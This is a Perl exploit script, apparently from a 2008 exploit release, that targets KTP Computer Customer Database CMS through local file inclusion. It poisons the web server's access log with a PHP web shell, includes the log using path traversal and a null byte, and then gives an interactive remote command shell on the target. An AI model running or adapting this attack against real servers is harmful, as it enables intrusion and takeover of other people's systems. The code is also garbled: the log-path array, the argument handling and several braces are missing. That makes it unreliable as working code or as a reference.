#!/usr/bin/perl -w
# KTPCCD Local File Inclusion Exploit
#AUTHOR : CWH Underground
#DATE : 30 November 2008
#SITE : cwh.citec.us
#APPLICATION : KTP Computer Customer Database CMS
#DOWNLOAD : http://downloads.sourceforge.net/ktpcomputercust/ktp_build_20081119.zip
#Note: magic_quotes_gpc = off
#Vulnerability in Local File Inclusion
#Wrote Exploit for Local File Inclusion <-> Remote Command Execution
#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK

use LWP::UserAgent;
use IO::Socket;
use LWP::Simple;

"../../.. /../../var/www/logs/access_log",

my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }

print "     KTP Computer Customer Database \n";
print "    Remote Command Execution Exploit \n";
print "      Discovered By CWH Underground \n";
if (@ARGV < 2)
    print "Usage: ./xpl.pl <Host> <Path>\n";
	print "Ex. ./xpl.pl www.hackme.com /ktp\n";



if ( $host   =~   /^http:/ ) {$host =~ s/http:\/\///g;}

print "\nTrying to Inject the Code...\n";

$CODE="<? passthru(\$_GET[cmd]) ?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";
print $socket "GET /cwhunderground ".$CODE." HTTP/1.1\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";

if ( $host   !~   /^http:/ ) {$host = "http://" . $host;}

 foreach $getlog(@apache)
				  $find= $host.$path."/?p=".$getlog."%00";
                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
				  $req = HTTP::Request->new(GET => $find);
				  $res = $xpl->request($req);
				  $info = $res->content;
                  if($info =~ /cwhunderground/)
                    {print "\nSuccessfully injected in $getlog \n";$log=$getlog;}

my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }

chomp( $cmd = <STDIN> );

while($cmd !~ "exit") {   
				  $shell= $host.$path."/?p=".$log."%00&cmd=$cmd";
                  $xpl = LWP::UserAgent->new() or die "Could not initialize browser\n";
				  $req = HTTP::Request->new(GET => $shell);
				  $res = $xpl->request($req);
				  $info = $res->content;
				  print "\n$info";

    my $sis="$^O";if ($sis eq 'MSWin32') { print "\n[cmd\@win32]\$ "; } else { print "\n[cmd\@unix]\$ "; }
    chomp( $cmd = <STDIN> );   